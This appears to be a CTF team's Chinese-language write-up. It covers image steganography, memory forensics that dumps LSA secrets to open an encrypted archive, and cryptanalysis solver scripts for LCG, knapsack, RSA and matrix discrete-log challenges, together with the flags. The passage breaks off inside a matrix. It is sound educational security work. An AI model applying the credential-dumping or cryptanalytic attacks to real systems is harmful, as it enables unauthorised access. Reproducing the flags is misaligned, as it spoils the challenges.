队伍名称
TeamGipsy战队
排名
9名
解题思路
MISC: 七仙女下凡、Dink Kirby PC
Crypto: easy_hash、LLLCCCGGG、easyRSA、Matrix
PWN:签个到
MISC
七仙女下凡(赛后复现)
题目很简单,但是因为一直在看取证,没看这个,加上做的时候可能有问题,就没出了,呜呜。
原本7张图,图都是一模一样的,好像区别就是宽高不一样
日常打开属性观察一下
从1-7,他的宽跟高的其中一部分都是翻倍的,stegsolve有一个水平交错跟垂直交错,跟这个一样,就尝试去搞
然后一直叠加到最后一个,保存出来,看一下通道,在0通道看到很明显的异常
导出,是jpg,转一下后缀,得到flag
赛中可能是哪一步没加上去,导致出问题了,猜测是叠加的顺序问题?用叠加出来的那张图去跟n.png原图叠加,跟用n.png去跟叠加出来的图叠加会不一样?
Dink Kirby PC(赛后复现)
最后找到AES密文是非预期,正解还不会。
题目给了两个hint:Computer Password Hint + Zipfile to decrypt encryptfile
hashdump出来的hash解不出来,就用lsadump(从注册表中提取LSA密钥信息(已解密))
得到一个key
然后在桌面上有一个hint.txt,在document下有一个加密的压缩包,hint.txt提示clip,就去看看clipboard,但是这个信息一直没用上,猜测是跟aes密文的地方有关
他这个意思如果我没猜错的话,是他把password的hint跟密文放在一块了,应该是跟lsa秘钥的地方在一起或者跟上面找到的压缩包的地方有关,但是我找了一天还是没找到,太菜了。
压缩包的密码就是之前的LSA密钥信息,得到一个密文
tr跟y都是换表,异或就是异或,其他就没啥了,很简单写个脚本
import string

# Substitution tables for the two table-swap steps mentioned in the write-up.
# `x` is the decimal-digit ciphertext string obtained from the archive; it is
# not defined anywhere on this page and must be assigned before this runs.
string1 = '0123456789'
string2 = '8195376024'
string3 = string.digits + string.ascii_lowercase
string4 = string.ascii_lowercase + string.digits

# Step 1: map the shuffled digits (string2) back onto 0-9 (string1).
digit_table = str.maketrans(string2, string1)
x = x.translate(digit_table)

# Step 2: every two decimal digits form one character code, XORed with 0x31.
flag = ''.join(
    chr(int(x[i:i + 2]) ^ 0x31)
    for i in range(0, len(x), 2)
)

# Step 3: positional swap between "digits+lowercase" and "lowercase+digits".
alnum_table = str.maketrans(string3, string4)
flag = flag.translate(alnum_table)
print(flag)
# Printed result (used as the key in the next step of the write-up):
#ead803812f23
得到key
最后是找密文。因为他给我的这个key是用网站加密的aes的key(因为正经aes加密的密钥长度不是12位),而用网页加密得到的aes密文开头是固定的(严格来说,固定的是 OpenSSL 兼容格式头 "Salted__" 的 base64 前缀,而不是盐值本身)
加密网站(https://www.sojson.com/encrypt_aes.html)
开头都是固定的U2Fsd,然后就可以直接在16进制中搜索这个数据,就找到了。要注意的是数据在里面是按 UTF-16LE 形式存储的,每个字符后面都跟着一个 00 字节,所以要按下面这种形式搜索
就找到啦55 00 32 00 46 00 73 00 64
很没有意思呜呜,期待正解
然后解密就是flag了,工具是啥应该不用交了吧,ENCRYPPTO
CRYPTO
easy_hash
根据 myhash 函数,已知 a1,可以求出 a2;已知 a2,可以求出 a3;
根据 函数,因为 的位数小于 位,所以 就是 各个部分和其 拼接后的结果,把 验证的结果去掉就是
from Crypto.Util.number import long_to_bytes
a1, secret1 = [1768672211043417187765307394749760760531160781992300779145800061219666992833602547480090118225665457075744297987672863699370162614965380859290914620736, 89139545215288033432210221492974990584987914397112840989583439688211128705545477536596587262069032020212762581490561288493533363888589066045095054475929099275247145877699370608950340925139625068446642116123285918461312297390611577025368805438078034230342490499137494400676347225155752865648820807846513044723]
# myhash and P come from the challenge source, which is not reproduced on this
# page; a1 and secret1 are the two published values assigned just above.
# Each coefficient is the hash of the previous one, so a1 alone fixes a2 and a3.
a2 = myhash(a1)
a3 = myhash(a2)
a = [0, a1, a2, a3]
# Remove the known degree-1..3 terms, evaluated at x = a[1], from secret1
# modulo P; what remains is the constant term a0.
# NOTE(review): this presumes the challenge computes
# secret1 = a0 + a1*x + a2*x**2 + a3*x**3 (mod P) with x = a1 -- confirm
# against the challenge source.
a0 = (secret1 - (a[1] * a[1] + a[2] * a[1] ** 2 + a[3] * a[1] ** 3)) % P
a[0] = a0
flag = long_to_bytes(a0)
print(flag)
# Printed bytes: the flag text is interleaved with other bytes. The "xNN"
# runs look like \xNN escapes whose backslashes were lost when the page was
# extracted -- TODO confirm against the original post.
# b'DAxd4x17xe9xf8SCTF{th1x98xf8xa5$s_is_theSx83xbfxc9_fe3st_qx8fxa9xd4xacuest1on}x07.Bxce'
# Flag after dropping the interleaved bytes:
# DASCTF{th1s_is_the_fe3st_quest1on}
DASCTF{th1s_is_the_fe3st_quest1on}
LLLCCCGGG
CVE库yyds!
# Excerpt of the challenge generator: a linear congruential generator (LCG)
# whose multiplier a, increment b and modulus n are all 300-bit primes.
# getPrime is not imported in this excerpt (presumably
# Crypto.Util.number.getPrime -- confirm against the challenge source).
a = getPrime(300)
b = getPrime(300)
n = getPrime(300)
output = []
# `seed` is initialised outside this excerpt. Ten consecutive, unmodified
# states are appended to `output`; publishing raw LCG states like this is what
# allows a, b and n to be recovered from the outputs alone, so an LCG must not
# be used where the stream has to stay unpredictable.
for i in range(10):
    seed = (a * seed + b) % n
    output.append(seed)
LCG:已知 output 求 n、a、b,跑脚本即可
from math import gcd
from sage.all import GF
from sage.all import is_prime_power
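def attack(y, m=None, a=None, c=None):
    """
    Recovers the parameters from a linear congruential generator.
    If no modulus is provided, attempts to recover the modulus from the outputs (may require many outputs).
    If no multiplier is provided, attempts to recover the multiplier from the outputs (requires at least 3 outputs).
    If no increment is provided, attempts to recover the increment from the outputs (requires at least 2 outputs).

    The recurrence assumed is y[i + 1] = (a * y[i] + c) % m, with every output
    given in full. The arithmetic is done in GF(m), so m must be a prime power.
    A ZeroDivisionError is to be expected if y[0] == y[1] modulo m while the
    multiplier is being recovered.

    :param y: the sequential output values obtained from the LCG
    :param m: the modulus of the LCG (can be None)
    :param a: the multiplier of the LCG (can be None)
    :param c: the increment of the LCG (can be None)
    :return: a tuple containing the modulus, multiplier, and the increment
    """
    if m is None:
        assert len(y) >= 4, "At least 4 outputs are required to recover the modulus"
        for i in range(len(y) - 3):
            # For consecutive differences d0, d1, d2 the value d2*d0 - d1^2 is
            # a multiple of the modulus; the gcd over all windows narrows it down.
            d0 = y[i + 1] - y[i]
            d1 = y[i + 2] - y[i + 1]
            d2 = y[i + 3] - y[i + 2]
            g = d2 * d0 - d1 * d1
            # abs(): the first candidate may be negative, and with exactly four
            # outputs it is never passed through gcd() to normalise its sign.
            m = abs(g) if m is None else gcd(g, m)

        assert is_prime_power(m), "Modulus must be a prime power, try providing more outputs"

    gf = GF(m)
    if a is None:
        assert len(y) >= 3, "At least 3 outputs are required to recover the multiplier"
        x0 = gf(y[0])
        x1 = gf(y[1])
        x2 = gf(y[2])
        # (x2 - x1) = a * (x1 - x0) in GF(m).
        a = int((x2 - x1) / (x1 - x0))

    if c is None:
        # Message corrected: this branch recovers the increment, not the multiplier.
        assert len(y) >= 2, "At least 2 outputs are required to recover the increment"
        x0 = gf(y[0])
        x1 = gf(y[1])
        c = int(x1 - a * x0)

    return m, a, c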
output = [75581294523880849612962675076574164955427439308298754836702542570856707873339581806556114, 85105032146983524265511965363979041936757881362506442483720291395014453678757599185295866, 1135521205967352800446368309480529634045225881261100886117662161359310082444102071893527191, 668602662320826002160475166323016971968419541611162501120982012317608523771962990634779874, 649673553234341629614052928960182629959348742983379959653724041939165898600067312959677865, 785853955591839090537858092210736716046894245185520583713505441606094906159642640920286905, 937799570303158165818350743257433287791556030352377438071495081189542968310256239806349207, 734514754865608924980327625447363286114899547828404532253101460271494241963897226149955073, 1106313725444442262780946046218124519471559148520571880678416934586056489046936771811070897, 8768152099561586039808874499029856564696410477579827751292882367683300035228537162519939]
# attack() returns (modulus, multiplier, increment); in the challenge's naming
# (seed = (a * seed + b) % n) that is (n, a, b).
print(attack(output))
# (1173843879841082693992136920285611943911704883357670151773674151308242415515507752596457609, 593647117401772145190396579663594527776190617014037091059262174448140362779813488948389210, 373193072645905805099743175375621363982796594540597615382605580257091541576660161082581472)
# Excerpt of the challenge's knapsack step. `key` is defined outside this
# excerpt; it is indexed character by character and each character is passed
# to int(), so it is presumably a string of '0'/'1' digits -- TODO confirm.
n = getPrime(256)
# a[i] = a[0] * 2**i: every weight is twice the previous one.
a = [getPrime(256)]
for i in range(1, len(key)):
    a.append(a[i - 1] * 2)
b = getPrime(256)
# m[i] = a[i] * b mod n; this is the list handed to the solver as `m`.
m = []
for i in range(len(key)):
    m.append((a[i] * b) % n)
# s is the subset sum of the m[i] selected by the digits of key.
s = 0
for i in range(len(key)):
    s += m[i] * int(key[i])
# The subset sum becomes the initial seed of the LCG, so recovering that seed
# exposes s, and solving the subset-sum instance then exposes key.
seed = s
背包加密:给了 m 和 seed 求 key,也是跑脚本
import os
import sys
from math import ceil
from math import log2
from math import sqrt
from sage.all import QQ
from sage.all import matrix
path = os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(os.path.abspath(__file__)))))
if sys.path[1] != path:
sys.path.insert(1, path)
from shared.lattice import shortest_vectors
def attack(a, s):
    """
    Tries to find e_i values such that sum(e_i * a_i) = s.
    This attack only works if the density of the a_i values is < 0.9408.
    More information: Coster M. J. et al., "Improved low-density subset sum algorithms"

    The density is computed as len(a) / log2(max(a)) and checked with an
    assertion before the lattice is built. shortest_vectors comes from the
    project-local shared.lattice module and is not shown on this page.

    :param a: the a_i values
    :param s: the s value
    :return: the e_i values, or None if the e_i values were not found
    """
    n = len(a)
    d = n / log2(max(a))
    N = ceil(1 / 2 * sqrt(n))
    assert d < 0.9408, f"Density should be less than 0.9408 but was {d}."

    # (n + 1) x (n + 1) basis: row i is the i-th unit vector with N * a[i] in
    # the last column; the last row is (1/2, ..., 1/2, N * s).
    L = matrix(QQ, n + 1, n + 1)
    for i in range(n):
        L[i, i] = 1
        L[i, n] = N * a[i]

    L[n] = [1 / 2] * n + [N * s]

    for v in shortest_vectors(L):
        s_ = 0
        e = []
        for i in range(n):
            # Map a coordinate of -1/2 or +1/2 to the bit 1 or 0; any other
            # value means this vector is not a 0/1 solution.
            ei = 1 - (v[i] + 1 / 2)
            if ei != 0 and ei != 1:
                break

            ei = int(ei)
            s_ += ei * a[i]
            e.append(ei)

        # NOTE(review): after an early break, e holds fewer than n entries but
        # is still returned if the partial sum happens to equal s.
        if s_ == s:
            return e
    # Falling off the end returns None: no candidate vector matched.
# from Crypto.Util.number import inverse
# n,a,b = (1173843879841082693992136920285611943911704883357670151773674151308242415515507752596457609, 593647117401772145190396579663594527776190617014037091059262174448140362779813488948389210, 373193072645905805099743175375621363982796594540597615382605580257091541576660161082581472)
# a += n
# b += n
# Step the LCG backwards once from the first published output:
# output[0] = (a * seed + b) % n, hence seed = (output[0] - b) * a^-1 mod n.
# seed = (output[0] - b) * inverse(a,n) % n
# Hard-coded value, presumably the result of the commented-out computation
# above; it is the knapsack sum s passed to attack(m, seed).
seed = 3521860349748519290898711091955310441882843724537073169429818749700115765292362
m= [72110328606337761986452574632319920368225905906258123752738204764660440229296, 54011682421724526639264309053337133761455956763651742732220904522794415369243, 17814390052498055944887777895371560547916058478438980691186304039062365649137, 35628780104996111889775555790743121095832116956877961382372608078124731298274, 71257560209992223779551111581486242191664233913755922764745216156249462596548, 52306145629033450225461382951669777408332612778647340756234927305972460103747, 14403316467115903117281925692036847841669370508430176739214349605418455118145, 28806632934231806234563851384073695683338741016860353478428699210836910236290, 57613265868463612469127702768147391366677482033720706956857398421673820472580, 25017556945976227604614565324992075758359109018576909140459291836821175855811, 50035113891952455209229130649984151516718218037153818280918583673642351711622, 9861252992953913084817421088665596058440581025443131788581662340758238333895, 19722505985907826169634842177331192116881162050886263577163324681516476667790, 39445011971815652339269684354662384233762324101772527154326649363032953335580, 78890023943631304678539368709324768467524648203545054308653298726065906671160, 67571073096311612023437897207346829960053441358225603844051092445605348252971, 44933171401672226713234954203390952945111027667586702914846679884684231416593, 89866342803344453426469908406781905890222055335173405829693359769368462833186, 89523710815737909519298976602261104805448255621482306886131214532210460577023, 88838446840524821704957112993219502635900656194100108999006924057894456064697, 87467918890098646076273385775136298296805457339335713224758343109262447040045, 84726862989246294818905931338969889618615059629806921676261181211998428990741, 79244751187541592304171022466637072262234264210749338579266857417470392892133, 68280527584132187274701204721971437549472673372634172385278209828414320694917, 46352080377313377215761569232640168123949491696403839997300914650302176300485, 
2495185963675757097882298253977629272903128343943175221346324294077887511621, 4990371927351514195764596507955258545806256687886350442692648588155775023242, 9980743854703028391529193015910517091612513375772700885385297176311550046484, 19961487709406056783058386031821034183225026751545401770770594352623100092968, 39922975418812113566116772063642068366450053503090803541541188705246200185936, 79845950837624227132233544127284136732900107006181607083082377410492400371872, 69482926884297456930826248043265566490804358963498709392909249814458335654395, 48756878977643916528011655875228426006612862878132914012562994622390206219441, 7304783164336835722382471539154145038229870707401323251870484238253947349533, 14609566328673671444764943078308290076459741414802646503740968476507894699066, 29219132657347342889529886156616580152919482829605293007481936953015789398132, 58438265314694685779059772313233160305838965659210586014963873906031578796264, 26667555838438374224478704415163613636682076269556667256672242805536692503179, 53335111676876748448957408830327227273364152539113334513344485611073385006358, 16461248562802499564273977449351747571732450029362164253433466215620304923367, 32922497125604999128547954898703495143464900058724328506866932431240609846734, 65844994251209998257095909797406990286929800117448657013733864862481219693468, 41481013711468999180550979383511273598863745186032809254212224718435974297587, 82962027422937998361101958767022547197727490372065618508424449436871948595174, 75715080054924999388563077322742387420459125695266732243593393867217432100999, 61221185318899001443485314434182067865922396341668959713931282727908399112649, 32233395846847005553329788657061428756848937634473414654607060449290333135949, 64466791693694011106659577314122857513697875268946829309214120898580666271898, 38724608596437024879678314416943008052399895489029153845172736790634867454447, 77449217192874049759356628833886016104799790978058307690345473581269734908894, 
64689459594797102185072417456469325234603726907252110607435442156013004728439, 39169944398643207036503994701635943494211598765639716441615379305499544367529, 78339888797286414073007989403271886988423197531279432883230758610999088735058, 66470802803621830812375138595241067001850540013694360993206012215471712380767, 42732630816292664291109436979179427028705224978524217213156519424416959672185, 85465261632585328582218873958358854057410449957048434426313038848833919344370, 80721548474219659830796907705415001139825044865232364079370572691141373599391, 71234122157488322327952975199527295304654234681600223385485640375756282109433, 52259269524025647322265110187751883634312614314335941997715775744986099129517, 14309564257100297310889380164201060293629373579807379222176046483445733169685, 28619128514200594621778760328402120587258747159614758444352092966891466339370, 57238257028401189243557520656804241174517494319229516888704185933782932678740, 24267539265851381153474201102305775374039133589594529004152866861039400268131, 48535078531702762306948402204611550748078267179189058008305733722078800536262, 6861182272454527280255964197920394521160679309513611243355962437631135983175, 13722364544909054560511928395840789042321358619027222486711924875262271966350, 27444729089818109121023856791681578084642717238054444973423849750524543932700, 54889458179636218242047713583363156169285434476108889946847699501049087865400, 19569941568321439150454586955423605363575013903353275120439893995571710641451, 39139883136642878300909173910847210727150027806706550240879787991143421282902, 78279766273285756601818347821694421454300055613413100481759575982286842565804, 66350557755620515869995855432086135933604256177961696190263646958047220042259, 42492140720290034406350870652869564892212657307058887607271788909567974995169, 84984281440580068812701741305739129784425314614117775214543577819135949990338, 79759588090209140291762642400175552593854774179371045655831650631745434891327, 
69310201389467283249884444589048398212713693309877586538407796256964404693305, 48411427987983569166128048966794089450431531570890668303560087507402344297261, 6613881185016140998615257722285471925867208092916831833864670008278223505173, 13227762370032281997230515444570943851734416185833663667729340016556447010346, 26455524740064563994461030889141887703468832371667327335458680033112894020692, 52911049480129127988922061778283775406937664743334654670917360066225788041384, 15613124169307258644203283345264843838879474437804804568579215125925110993419, 31226248338614517288406566690529687677758948875609609137158430251850221986838, 62452496677229034576813133381059375355517897751219218274316860503700443973676, 34696018563507071819985426550816043736039940453573931775378216000874422858003, 69392037127014143639970853101632087472079880907147863550756432001748845716006, 48575099463077289946300865991961467969163906765431222328257358996971226342663, 6941224135203582558960891772620228963331958481997939883259212987415987595977, 13882448270407165117921783545240457926663916963995879766518425974831975191954, 27764896540814330235843567090480915853327833927991759533036851949663950383908, 55529793081628660471687134180961831706655667855983519066073703899327900767816, 20850611372306323609733428150620956438315480663102533358891902792129336446283, 41701222744612647219466856301241912876630961326205066717783805584258672892566, 83402445489225294438933712602483825753261922652410133435567611168517345785132, 76595916187499591544226584993664944531527990255955762097879717330508226480915, 62982857584048185754812329776027182088060125463047019422503929654489987872481, 35756740377145374175983819340751657201124395877229534071752354302453510655613, 71513480754290748351967638681503314402248791754459068143504708604907021311226, 52817986717630499370294437151703921829501728460053631513753912203287577533103, 15426998644310001406948034092105136684007601871242758254252319400048689976857, 
30853997288620002813896068184210273368015203742485516508504638800097379953714, 61707994577240005627792136368420546736030407484971033017009277600194759907428, 33207014363529013921943432525538386497064959921077561260763050193863054725507, 66414028727058027843886865051076772994129919842155122521526100387726109451014, 42619082663165058354132889890850839013263984635445740269796695768925753812679, 85238165326330116708265779781701678026527969270891480539593391537851507625358, 80267355861709236082890719352100649078060083492918456305931278069176550161367, 70325736932467474832140598492898591181124311936972407838607051131826635233385, 50442499073983952330640356774494475387252768825080310903958597257126805377421, 10676023357016907327639873337686243799509682601296117034661689507727145665493, 21352046714033814655279746675372487599019365202592234069323379015454291330986, 42704093428067629310559493350744975198038730405184468138646758030908582661972, 85408186856135258621118986701489950396077460810368936277293516061817165323944, 80607398921319519908597133191677193817159066571873367781331527117107865558539, 71005823051688042483553426172051680659322278094882230789407549227689266027729, 51802671312425087633466012132800654343648701140899956805559593448852066966109, 13396367833899177933291184054298601712301547232935408837863681891177668842869, 26792735667798355866582368108597203424603094465870817675727363782355337685738, 53585471335596711733164736217194406849206188931741635351454727564710675371476, 16961967880242426132688632223086106723416522814618765929653950122894885653603, 33923935760484852265377264446172213446833045629237531859307900245789771307206, 67847871520969704530754528892344426893666091258475063718615800491579542614412, 45486768250988411727868217573386146812336327468085622663976095976632620139475, 764561711025826122095594935469586649676799887306740554696686946738775189601, 1529123422051652244191189870939173299353599774613481109393373893477550379202, 
3058246844103304488382379741878346598707199549226962218786747786955100758404, 6116493688206608976764759483756693197414399098453924437573495573910201516808, 12232987376413217953529518967513386394828798196907848875146991147820403033616, 24465974752826435907059037935026772789657596393815697750293982295640806067232, 48931949505652871814118075870053545579315192787631395500587964591281612134464, 7654924220354746294595311528804384183634530526398286227920424176036759179579, 15309848440709492589190623057608768367269061052796572455840848352073518359158, 30619696881418985178381246115217536734538122105593144911681696704147036718316, 61239393762837970356762492230435073469076244211186289823363393408294073436632, 32269812734724943379884144249567439963156633373508074873471281810061681783915, 64539625469449886759768288499134879926313266747016149746942563620123363567830, 38870276147948776185895736786967052877630678445167794720629622233720262046311, 77740552295897552371791473573934105755261356890335589441259244467440524092622, 65272129800844107409942106936565504535526858731806674109262983928354583095895, 40335284810737217486243373661828302096057862414748843445270462850182701102441, 80670569621474434972486747323656604192115724829497686890540925700365402204882, 71132164451997872611332654436010501409235594610130869007826346394204339320415, 52055354113044747889024468660718295843475334171397233242397187781882213551481, 13901733435138498444408097110133884711954813293929961711538870557237962013613, 27803466870276996888816194220267769423909626587859923423077741114475924027226, 55606933740553993777632388440535538847819253175719846846155482228951848054452, 21004892690156990221623936669768370720642651302575188919055459451377231019555, 42009785380313980443247873339536741441285302605150377838110918902754462039110, 84019570760627960886495746679073482882570605210300755676221837805508924078220, 77830166730304924439350653146844258790145355371737006579188170604491383067091, 
65451358669658851545060466082385810605294855694609508385120836202456301044833]
# attack() returns the 0/1 coefficients e_i with sum(e_i * m[i]) == seed, or
# None if no candidate vector matched. The printed list appears to be reused
# as `key` in the next step.
print(attack(m,seed))
# [1, 0, 0, 0, 0, 0, 1, 0, 1, 1, 1, 0, 0, 1, 0, 0, 1, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 0, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1, 0, 1, 1, 1, 0, 1, 0, 0, 0, 1, 0, 1, 1, 0, 0, 1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 0, 1, 0, 1, 0, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 1, 0, 0, 0, 1, 1, 0, 0, 1, 1, 0, 0, 1, 0, 1, 1, 1, 1, 1, 0, 0, 1, 1, 0, 0, 0, 1, 0, 1, 1, 1, 0, 0, 1, 1, 0, 1, 0, 1, 1, 1, 1, 1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 0, 1, 0, 1, 1]
# Excerpt of the challenge's final stage; key, getPrime, xor and hashlib are
# defined or imported outside this excerpt.
# The bit string key is read as one base-2 integer.
state = int(key, 2)
a = getPrime(256)
b = getPrime(256)
c = getPrime(256)
# 10 ** 10000 iterations cannot be executed one at a time. The iteration count
# gives no protection, though: each step is the same affine map modulo c, and
# repeated application of that map can be computed with fast exponentiation.
for _ in range(10 ** 10000):
    state = (a * state + b) % c
flag = b'****************************************'
# The MD5 hex digest of the decimal string of the final state is XORed with
# the flag; the hex of that XOR is the published value.
state_md5 = hashlib.md5(str(state).encode()).hexdigest()
xorflag = xor(flag, state_md5).hex()
矩阵快速幂:$10^{10000}$ 次循环,搞一个矩阵快速幂即可
# sagemath
import hashlib
from Crypto.Util.number import long_to_bytes, bytes_to_long
key = [1, 0, 0, 0, 0, 0, 1, 0, 1, 1, 1, 0, 0, 1, 0, 0, 1, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 0, 1, 1, 0, 1, 1, 1, 0, 0, 1,
1, 0, 1, 1, 1, 0, 1, 0, 0, 0, 1, 0, 1, 1, 0, 0, 1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 0, 1, 0, 1, 0, 1, 0, 1, 1,
1, 1, 1, 0, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 1, 0, 0, 0, 1, 1, 0, 0, 1, 1, 0, 0, 1, 0, 1, 1, 1, 1, 1, 0, 0, 1,
1, 0, 0, 0, 1, 0, 1, 1, 1, 0, 0, 1, 1, 0, 1, 0, 1, 1, 1, 1, 1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 0, 1, 0, 1, 1]
a = 102146678855348749881681741830301892566150942749854546938156269348575567682569
b = 57926598868103510549704115342815226386495366694945712679089221082045615713293
c = 79112540456632613121737537841885533313599936328220061653608162113976717833173
xorflag = 0x2079677330734e7d07116d73543d03316c6501555c02403b7201080612101049
# Sage code: ^ is exponentiation and ^^ is XOR in this listing.
# Join the recovered bit list into a string and read it as a base-2 integer,
# matching the challenge's state = int(key, 2).
state = int(''.join([str(i) for i in key]), 2)
# One LCG step state -> a * state + b (mod c) written as a matrix product:
# [[a, 1], [0, 1]] * (state, b) = (a * state + b, b).
A = matrix(Zmod(c), [[a, 1], [0, 1]])
B = vector(Zmod(c), [state, b])
# Raising A to the iteration count and applying it once to B replaces the
# 10 ** 10000 individual steps; the first component is the final state.
state = int((A ^ (10 ** 10000) * B)[0])
# state = 5413978693489756582509930284917854732906886271552898511650182850401353715151
# Rebuild the keystream exactly as the challenge did (MD5 hex digest of the
# decimal string), turn it into an integer and XOR it with the published value.
state_md5 = hashlib.md5(str(state).encode()).hexdigest()
state_md5 = bytes_to_long(state_md5.encode())
print(long_to_bytes(state_md5 ^^ xorflag))
# b'DASCTF{D0u_Ge_1S_R4al1y_G00d!!!}'
DASCTF{D0u_Ge_1S_R4al1y_G00d!!!}
easyrsa
先分解 n,可以用网站(https://www.alpertron.com.ar/ECM.HTM)分解,或是用 two_squares 分解
然后 的 用基底转化分解(哪个是 ,哪个是 ,都可以试一试)
最后有限域开方求
from gmpy2 import *
from Crypto.Util.number import *
n = 86073852484226203700520112718689325205597071202320413471730820840719099334770
n2 = 77582485123791158683121280616703899430016469065264033598472741751344256774648355531493586310864150337351815051848231793841751148287075688226384710343269278032576253497728407800522536152937473072438970839941923618053297480433385258911357458745700958378269978384670108026994918504237309072908971746160378531040480539649223970964653553804442759847964633088481940435582792404175653758785321463055628690804551479982557193366035172983893595403859872458966844805671311011033726279121149599533093604586152158331657286488305064843651636225644328162652701896037366058322959361248649656784810609391313
c = 260434870216758498838321584935711394249835963213639852217120194663627852693180232036075839403208332707552953757185774603238436545434522971149891312380970896040823539050341723863717581297624370198483155582245220695123793458717418658539983101802256991837534210806768587736557644192367876024337837658337683388449336720569707094997412847022794461117019613124291022681935875774139147643806772608929174881451749463825639214096129554621195116737322890163556732291246108250543079041977037626755130422879778449546701988814607595746282148723362288451970833214072743929855505520539885650891349827459470540263153862109871050950881032032388185414677989393461533362690744724752363346530211163516319373099647590952338730
# Sage code (uses var, ZZ, the PR.<x> syntax and ^ as exponentiation).
e = 7
# p1,q = two_squares(n)
# Hard-coded values, presumably the result of the commented-out call above.
p1 = 200170033707580057053975766783012322797
q = 214489650309129059054871357172058931331
# NOTE(review): the origin of this added constant is not shown on the page;
# presumably it comes from the challenge source -- confirm.
q = q + 63066105847160076051036559850646146794
# Write n2 in base q and read the digits as polynomial coefficients. Factoring
# that polynomial and evaluating each factor at the base gives integer factors
# of n2.
base = q
polynomial = 0
var('x')
# NOTE: the loop variable e shadows e = 7 above; the exponent is hard-coded as
# 7 in the rest of the script, so the later steps are unaffected.
for i, e in enumerate(ZZ(n2).digits(base)):
    polynomial += e * x ** i
res = polynomial.factor_list()
primes = []
for r in res:
    f = r[0]
    primes.append(f(base))
# Assumes the factorisation produced at least three factors.
p = int(primes[0])
q = int(primes[1])
r = int(primes[2])
# Advance all four values to their next primes in lockstep until every one of
# them is congruent to 1 modulo 7 at the same time.
while True:
    p1 = next_prime(p1)
    p = next_prime(p)
    q = next_prime(q)
    r = next_prime(r)
    if (p - 1) % 7 == 0 and (q - 1) % 7 == 0 and (r - 1) % 7 == 0 and (p1 - 1) % 7 == 0:
        break
# n3 is computed here but not used again in the visible code.
n3 = p1 ** 3 * p * q * r
# 7 divides p - 1, so 7 has no inverse modulo p - 1 and the usual private
# exponent does not exist modulo p; instead, all 7th roots of c modulo p are
# computed and the one containing the flag prefix is printed.
PR.<x> = Zmod(p)[]
f = x^7 - c
res = f.roots()
for i in res:
    if b'DASCTF' in long_to_bytes(int(i[0])):
        print(long_to_bytes(int(i[0])))
# b'DASCTF{I_d0nt_kn0w_wh@t_i_w@nt_t0_d0_ju3t_d0_it_attack_we@k_prim4!!!}'
DASCTF{I_d0nt_kn0w_wh@t_i_w@nt_t0_d0_ju3t_d0_it_attack_we@k_prim4!!!}
Matrix
赛后出,跑了50多分钟
思路清晰,就是矩阵上的离散对数,用 Pohlig-Hellman + BSGS 算法可出,照着大佬博客的脚本一通乱改,勉强能用。
import tqdm
import hashlib
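def babystep_giantstep(g, y, p):
    """
    Baby-step giant-step search for x in [0, p) with g^x == y, for square
    matrices (Sage code: ^ is exponentiation).

    The identity matrix is built over Zmod(P), where P is a module-level name
    defined elsewhere in the file, not the parameter p. Matrices are compared
    through their string form, which is used as the dictionary key.

    :param g: the base matrix
    :param y: the target matrix
    :param p: the size of the search range (the caller passes a prime factor of the group order)
    :return: an x with g^x == y, or None if no match was found
    """
    # Local import so the fix does not depend on the file's import block.
    from math import isqrt

    # The step size must satisfy m * m >= p, otherwise part of [0, p) is never
    # searched. Rounding sqrt(p - 1) to the nearest integer, as the original
    # did, can fall short (for p = 229 it gives m = 15 and 15 * 15 = 225).
    m = isqrt(p - 1) + 1
    table = {}
    # Build the identity matrix with the same dimension as g.
    gr = list(matrix(Zmod(P), len(g[0])))
    for i in range(len(g[0])):
        gr[i][i] = 1
    gr = matrix(Zmod(P), gr)
    # Baby steps: remember g^r for r in [0, m).
    for r in tqdm.tqdm(range(m)):
        table[str(gr)] = r
        gr = g * gr
    # Giant steps: multiply y by g^(-m) until it lands on a stored baby step.
    gm = g ^ (-m)
    ygqm = y
    for q in tqdm.tqdm(range(m)):
        if str(ygqm) in table:
            print(q * m + table[str(ygqm)], p)
            return q * m + table[str(ygqm)]
        ygqm = ygqm * gm
    return None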
def pohlig_hellman_DLP(g, y, p):
    """
    Combine per-prime discrete logarithms with the CRT (Sage code: ^ is
    exponentiation).

    For every prime q dividing p - 1, g and y are raised to (p - 1) // q and
    the logarithm is searched in a range of size q. The exponent of q in the
    factorisation is ignored, and a prime whose search returns None or a value
    <= 1 is skipped, so the result is only determined modulo the product of
    the primes that were kept.

    :param g: the base
    :param y: the target
    :param p: the value whose predecessor p - 1 is factored
    :return: the CRT combination of the residues that were kept
    """
    moduli = []
    residues = []
    for prime, _ in factor(p-1):
        cofactor = int((p-1)//prime)
        residue = babystep_giantstep(g^cofactor, y^cofactor, prime)
        if residue is None or residue <= 1:
            continue
        moduli.append(prime)
        residues.append(residue)
    return crt(residues, moduli)
p = 12143520799543738643
P = p
A = [[12143520799533590286, 1517884368, 12143520745929978443, 796545089340, 12143514553710344843, 28963398496032, 12143436449354407235, 158437186324560, 12143329129091084963, 144214939188320, 12143459416553205779, 11289521392968],
[12143520799533124067, 1552775781, 12143520745442171123, 796372987410, 12143514596803995443, 28617862048776, 12143437786643111987, 155426784993480, 12143333265382547123, 140792203111560, 12143460985399172467, 10983300063372],
[12143520799533026603, 1545759072, 12143520746151921286, 781222462020, 12143514741528175043, 27856210942560, 12143440210529480891, 150563969013744, 12143339455702534403, 135941365971840, 12143463119774571623, 10579745342712],
[4857408319806885466, 2428704161425648657, 12143520747462241175, 758851601758, 12143514933292307603, 7286139389566980165, 9714738936567334300, 144947557513044, 12143346444338047691, 130561054163540, 4857352974113333366, 2428714303424782417],
[12143520799533339320, 1476842796, 12143520749060275613, 733281428880, 12143515144091549812, 25896324662208, 12143446129977471347, 139126289668080, 12143353609086952433, 125093278125816, 12143467808884068695, 9705993135696],
